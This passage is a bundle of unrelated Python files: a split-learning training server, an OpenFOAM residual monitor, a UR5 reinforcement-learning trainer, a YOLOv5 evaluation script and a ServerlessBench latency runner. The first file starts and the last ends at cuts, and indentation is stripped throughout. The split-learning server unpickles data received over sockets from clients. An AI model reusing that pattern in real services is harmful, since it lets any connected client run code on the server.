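        raw_len = recvall(s, 4)                               # reuse the helper above
        return pickle.loads(recvall(s, struct.unpack('>I', raw_len)[0]))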
def handle_request(sock, getid, content):
"""
executes the requested function, depending on the getid, and passes it the received message
:param sock: socket
:param getid: id of the function that should be executed for the received message
:param content: message content
"""
switcher = {
0: calc_gradients,
1: get_testacc,
2: updateclientmodels,
}
switcher.get(getid, lambda s, c: print("invalid request received"))(sock, content)
def get_testacc(conn, msg):
"""
this method does the forward propagation with the received data, from the first layer of the decoder to the last layer
of the model. It sends information about loss/accuracy back to the client.
:param conn: connection
:param msg: message
"""
with torch.no_grad():
client_output_test, label_test = msg['client_output_test'], msg['label_test']
client_output_test, label_test = client_output_test.to(device), label_test.to(device)
client_output_test = decode(client_output_test) #
client_output_test = client_output_test.clone().detach().requires_grad_(True)
output_test = server(client_output_test)
loss_test = error(output_test, label_test)
test_loss = loss_test.data
correct_test = torch.sum(output_test.argmax(dim=1) == label_test).item()
msg = {"test_loss": test_loss,
"correct_test": correct_test,
}
send_msg(conn, msg)
def updateclientmodels(sock, updatedweights):
"""
sends the current client-side weights to all connected clients,
except the client that is currently training
:param sock: the socket
:param updatedweights: the current client-side weights
"""
client.load_state_dict(updatedweights)
for clientss in connectedclients:
try:
if clientss != sock:
send_msg(clientss, updatedweights)
except:
pass
def calc_gradients(conn, msg):
"""
this method does the forward propagation with the received data,
from the first layer of the decoder to the last layer
of the model. It calculates the loss and does the backward propagation up to the
cut layer of the model.
Depending on whether the loss threshold is reached, it sends the gradient of the
backward propagation at the cut layer and
information about loss/accuracy/training time back to the client.
:param conn: the connected socket of the currently training client
:param msg: the received data
"""
start_time_training = time.time()
optimizer.zero_grad()
with torch.no_grad():
client_output_train, label_train, batchsize, batch_concat = msg['client_output_train'], msg['label_train'], msg[
'batchsize'], msg['batch_concat'] # client output tensor
client_output_train, label_train = client_output_train.to(device), label_train
client_output_train = decode(client_output_train)
splittensor = torch.split(client_output_train, batchsize, dim=0)
dc = 0
while dc < batch_concat:
tenss = splittensor[dc]
tenss = tenss.requires_grad_(True)
tenss = tenss.to(device)
output_train = server(tenss) # forward propagation
with torch.no_grad():
lbl_train = label_train[dc].to(device)
loss_train = error(output_train, lbl_train) # calculates cross-entropy loss
train_loss = loss_train.data
loss_train.backward() # backward propagation
client_grad = tenss.grad.clone().detach()
optimizer.step()
add_correct_train = torch.sum(output_train.argmax(dim=1) == lbl_train).item()
add_total_train = len(lbl_train)
total_training_time = time.time() - start_time_training
if train_loss.item() > update_threshold:
pass
else:
client_grad = "abort"
msg = {"grad_client": client_grad,
"train_loss": train_loss,
"add_correct_train": add_correct_train,
"add_total_train": add_total_train,
"active_trtime_batch_server": total_training_time,
}
print("Create the msg")
send_msg(conn, msg)
print("Send the msg back")
dc += 1
def initialize_client(conn):
"""
called when a new client connects. If the new client is not the first connected
client, send the initial weights to
the newly connected client
:param conn:
"""
print("connected clients: ",len(connectedclients))
if len(connectedclients) == 1:
msg = 0
else:
initial_weights = client.state_dict()
msg = initial_weights
send_msg(conn, msg)
def clientHandler(conn, addr):
initialize_client(conn)
while True:
try:
recieve_msg(conn)
except:
print("No message, wait!")
pass
connectedclients = []
trds = []
def main():
"""
initialize device, server model, initial client model, optimizer, loss, decoder and accepts new clients
"""
print(torch.version.cuda)
global device
device = 'cpu'
#torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
if (torch.cuda.is_available()):
print("training on gpu")
seed = 0
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
global server
server = Server()
server.to(device)
global client
client = initial_Client()
client.to(device)
print("initial_Client complete.")
global optimizer
optimizer = SGD(server.parameters(), lr=lr, momentum=0.9)
global error
error = nn.CrossEntropyLoss()
print("Calculate CrossEntropyLoss complete.")
global decode
decode = Decode()
decode.load_state_dict(torch.load("./convdecoder.pth"))
decode.eval()
decode.to(device)
print("Load decoder parameters complete.")
s = socket.socket()
s.bind((host, port))
s.listen(max_numclients)
print("Listen to client reply.")
for i in range(max_numclients):
conn, addr = s.accept()
connectedclients.append(conn)
print('Connected with', addr)
t = Thread(target=clientHandler, args=(conn, addr))
print('Thread established')
trds.append(t)
t.start()
print('Thread start')
for t in trds:
t.join()
if __name__ == '__main__':
main()
|
monitor.py
|
import sys
sys.path.append(r"/public1/home/sc90898/OpenFOAMWorkspace/sc90898-7/utilities/")
import signal
import multiprocessing as mp
import time
from residual_monitor import read_residuals,plot_multiple_residuals,quit
log="run.log"
pressure_name="p_rgh"
nCorrectors=1
interval=20
sample_size=300
# m_residuals=[["h"],["Ux","Uy",pressure_name]]
# m_residuals=[["h"],["Ux",pressure_name]]
m_residuals=[["h","CO2","O2"]]
m_thresholds=[[1e-3,1e-4,1e-5,1e-6,1e-7]]
m_save_files=["residuals1.jpg"]
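# process_fun (below) periodically re-reads the solver log starting from the last parsed
# line, extracts the residuals and run-time info, refreshes the residual plots, and then
# sleeps for `interval` seconds before the next pass.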
def process_fun():
line_offset=0
iterations_offset=0
while True:
df,line_offset,iterations,info=read_residuals(log,line_offset,pressure_name,nCorrectors,sample_size)
physical_time=info.get("cum_physical_time","not found")
execution_time=info.get("cum_execution_time","not found")
title=f"physical time : {physical_time} s, execution time : {execution_time} s"
titles=[title]*len(m_residuals)
delta_time=info.get("latest_delta_time","not found")
maxCo=info.get("maxCo","not found")
meanCo=info.get("meanCo","not found")
if "minT" in info:
    minT=info["minT"]
    maxT=info["maxT"]
else:
    minT="not found"
    maxT="not found"
residual_coke=info.get("coke","not found")
text=f"latest_delta_time: {delta_time} s \n" + \
f"mean CFL num: {meanCo}\n" + \
f"max CFL num: {maxCo}\n" + \
f"min T: {minT}, max T: {maxT}\n" + \
f"residual coke: {residual_coke}"
texts=[text]*len(m_residuals)
plot_multiple_residuals(df,iterations_offset,m_residuals,m_thresholds,titles,texts,m_save_files)
iterations_offset+=iterations
time.sleep(interval)
if __name__=="__main__":
try:
signal.signal(signal.SIGINT,quit)
signal.signal(signal.SIGTERM,quit)
p=mp.Process(target=process_fun)
p.daemon=True
p.start()
while True:
    time.sleep(1)  # keep the main process alive so the signal handlers stay active
except Exception as err:
print(f"Error Message: {err}")
|
ur5_train.py
|
import numpy as np
import torch
import argparse
import os
import time
import json
import threading
from sac_rad import SacRadAgent
import utils
from logger import Logger
import torch.multiprocessing as mp
from configs.ur5_config import config
from envs.ur5_wrapper import UR5Wrapper
def parse_args():
parser = argparse.ArgumentParser()
# environment
parser.add_argument('--setup', default='Visual-UR5')
parser.add_argument('--ip', default='129.128.159.210', type=str)
parser.add_argument('--camera_id', default=1, type=int)
parser.add_argument('--image_width', default=160, type=int)
parser.add_argument('--image_height', default=90, type=int)
parser.add_argument('--target_type', default='reaching', type=str)
parser.add_argument('--random_action_repeat', default=1, type=int)
parser.add_argument('--agent_action_repeat', default=1, type=int)
parser.add_argument('--image_history', default=3, type=int)
parser.add_argument('--joint_history', default=1, type=int)
parser.add_argument('--ignore_joint', default=False, action='store_true')
parser.add_argument('--episode_length', default=4.0, type=float)
parser.add_argument('--dt', default=0.04, type=float)
# replay buffer
parser.add_argument('--replay_buffer_capacity', default=100000, type=int)
parser.add_argument('--rad_offset', default=0.01, type=float)
# train
parser.add_argument('--init_step', default=1000, type=int)
parser.add_argument('--env_step', default=100000, type=int)
parser.add_argument('--batch_size', default=128, type=int)
parser.add_argument('--async', dest='use_async', default=False, action='store_true')  # 'async' is reserved in Python 3.7+, so store the flag as 'use_async'
parser.add_argument('--max_update_freq', default=10, type=int)
# critic
parser.add_argument('--critic_lr', default=3e-4, type=float)
parser.add_argument('--critic_tau', default=0.01, type=float)
parser.add_argument('--critic_target_update_freq', default=2, type=int)
# actor
parser.add_argument('--actor_lr', default=3e-4, type=float)
parser.add_argument('--actor_update_freq', default=2, type=int)
# encoder
parser.add_argument('--encoder_tau', default=0.05, type=float)
# sac
parser.add_argument('--discount', default=0.99, type=float)
parser.add_argument('--init_temperature', default=0.1, type=float)
parser.add_argument('--alpha_lr', default=1e-4, type=float)
# misc
parser.add_argument('--seed', default=9, type=int)
parser.add_argument('--work_dir', default='.', type=str)
parser.add_argument('--save_tb', default=False, action='store_true')
parser.add_argument('--save_model', default=False, action='store_true')
#parser.add_argument('--save_buffer', default=False, action='store_true')
parser.add_argument('--save_model_freq', default=10000, type=int)
parser.add_argument('--load_model', default=-1, type=int)
parser.add_argument('--device', default='', type=str)
parser.add_argument('--lock', default=False, action='store_true')
args = parser.parse_args()
return args
def main():
args = parse_args()
utils.set_seed_everywhere(args.seed)
env = UR5Wrapper(
setup = args.setup,
ip = args.ip,
seed = args.seed,
camera_id = args.camera_id,
image_width = args.image_width,
image_height = args.image_height,
target_type = args.target_type,
image_history = args.image_history,
joint_history = args.joint_history,
episode_length = args.episode_length,
dt = args.dt,
ignore_joint = args.ignore_joint,
)
if not args.use_async:
version = 'SACv0'
elif args.use_async and args.lock:
version = 'SACv1'
elif args.use_async:
version = 'SACv2'
else:
raise NotImplementedError('Not supported mode!')
args.work_dir += f'/results/{version}_{args.target_type}_' \
f'dt={args.dt}_bs={args.batch_size}_' \
f'dim={args.image_width}*{args.image_height}_{args.seed}/'
utils.make_dir(args.work_dir)
model_dir = utils.make_dir(os.path.join(args.work_dir, 'model'))
buffer_dir = utils.make_dir(os.path.join(args.work_dir, 'buffer'))
with open(os.path.join(args.work_dir, 'args.json'), 'w') as f:
json.dump(vars(args), f, sort_keys=True, indent=4)
if args.device == '':
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
else:
device = torch.device(args.device)
agent = SacRadAgent(
obs_shape=env.observation_space.shape,
state_shape=env.state_space.shape,
action_shape=env.action_space.shape,
device=device,
training_steps=args.env_step // args.agent_action_repeat,
net_params=config,
discount=args.discount,
init_temperature=args.init_temperature,
alpha_lr=args.alpha_lr,
actor_lr=args.actor_lr,
actor_update_freq=args.actor_update_freq,
critic_lr=args.critic_lr,
critic_tau=args.critic_tau,
critic_target_update_freq=args.critic_target_update_freq,
encoder_tau=args.encoder_tau,
rad_offset=args.rad_offset,
)
L = Logger(args.work_dir, use_tb=args.save_tb)
if args.use_async:
agent.share_memory()
# easily transfer step information to 'async_recv_data'
def recv_from_update(buffer_queue, L, stop):
while True:
if stop():
break
stat_dict = buffer_queue.get()
for k, v in stat_dict.items():
L.log(k, v, step)
# initialize processes in 'spawn' mode, required by CUDA runtime
ctx = mp.get_context('spawn')
MAX_QSIZE = 3
input_queue = ctx.Queue(MAX_QSIZE)
output_queue = ctx.Queue(MAX_QSIZE)
tensor_queue = ctx.Queue(MAX_QSIZE)
if args.lock:
sync_queue = ctx.Queue(1)
sync_queue.put(1)
else:
sync_queue = None
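# Data flow in async mode (a summary of the wiring below): the environment loop pushes
# transitions into input_queue -> the AsyncRadReplayBuffer process augments and batches
# them onto tensor_queue -> agent.async_update consumes the batches and reports training
# statistics on output_queue -> the recv_from_update thread logs them. When --lock is
# set, sync_queue appears to act as a token that serializes buffer sampling and updates.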
# initialize data augmentation process
replay_buffer_process = ctx.Process(target=utils.AsyncRadReplayBuffer,
args=(
env.observation_space.shape,
env.state_space.shape,
env.action_space.shape,
args.replay_buffer_capacity,
args.batch_size,
args.rad_offset,
device,
input_queue,
tensor_queue,
args.init_step,
args.max_update_freq,
sync_queue
)
)
replay_buffer_process.start()
# initialize SAC update process
update_process = ctx.Process(target=agent.async_update,
args=(tensor_queue, output_queue, sync_queue))
update_process.start()
# flag for whether stop threads
stop = False
# initialize training statistics receiving thread
stat_recv_thread = threading.Thread(target=recv_from_update, args=(output_queue, L, lambda: stop))
stat_recv_thread.start()
else:
replay_buffer = utils.RadReplayBuffer(
obs_shape=env.observation_space.shape,
state_shape=env.state_space.shape,
action_shape=env.action_space.shape,
capacity=args.replay_buffer_capacity,
batch_size=args.batch_size,
rad_offset=args.rad_offset,
device=device
)
episode, episode_reward, episode_step, done = 0, 0, 0, True
start_time = time.time()
obs, state = env.reset()
for step in range(args.env_step + 1 + args.init_step):
# sample action for data collection
if step < args.init_step:
if step % args.random_action_repeat == 0:
action = env.action_space.sample()
else:
with utils.eval_mode(agent):
if step % args.agent_action_repeat == 0:
action = agent.sample_action(obs, state)
# step in the environment
next_obs, next_state, reward, done, _ = env.step(action)
episode_reward += reward
if args.use_async:
input_queue.put((obs, state, action, reward, next_obs, next_state, done))
else:
replay_buffer.add(obs, state, action, reward, next_obs, next_state, done)
if step >= args.init_step:
stat_dict = agent.update(*replay_buffer.sample())
for k, v in stat_dict.items():
L.log(k, v, step)
obs = next_obs
state = next_state
episode_step += 1
if done and step > 0:
L.log('train/duration', time.time() - start_time, step)
L.log('train/episode_reward', episode_reward, step)
start_time = time.time()
L.dump(step)
obs, state = env.reset()
done = False
episode_reward = 0
episode_step = 0
episode += 1
L.log('train/episode', episode, step)
if args.save_model and step > 0 and step % args.save_model_freq == 0:
agent.save(model_dir, step)
# Terminate all threads and processes once done
if step == args.env_step + args.init_step and args.use_async:
stop = True
stat_recv_thread.join()
replay_buffer_process.terminate()
update_process.terminate()
# Terminate environment processes
env.terminate()
if __name__ == '__main__':
main()
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
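# iouv holds the 10 IoU thresholds 0.50, 0.55, ..., 0.95 used for COCO-style mAP;
# each prediction is later marked correct/incorrect once per threshold (the niou-wide
# boolean rows of the 'correct' matrix below).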
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'study': # run over a range of settings and save/plot
for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
x = list(range(320, 800, 64)) # x axis
y = [] # y axis
for i in x: # img-size
print('\nRunning %s point %s...' % (f, i))
r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(f, x) # plot
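# Illustrative invocations (the dataset and weights paths below are assumptions, not shipped with this script):
#   python test.py --data data/coco128.yaml --weights yolov5s.pt --img-size 640
#   python test.py --task study --data data/coco128.yaml --weights yolov5s.pt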
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
# this script should be executed in the parent directory of the scripts/ folder
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./scripts/run-single.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes):
for j in range(warmupTimes):
r = os.popen("./scripts/action_invoke.sh")
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "java8action"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last returned one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
# Scan the line for its two 13-digit millisecond timestamps (invokeTime, endTime).
# Bounding the loop on both count and i avoids spinning forever on malformed lines.
while count < 2 and i < len(line):
    if line[i].isdigit():
        parsedTimes[count] = line[i:i+13]
        i += 13
        count += 1
    else:
        i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
print("%s / %d requests finished in %.2f seconds" %(requestNum, (loop * client), (duration/1000)))
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
if requestNum > 0:
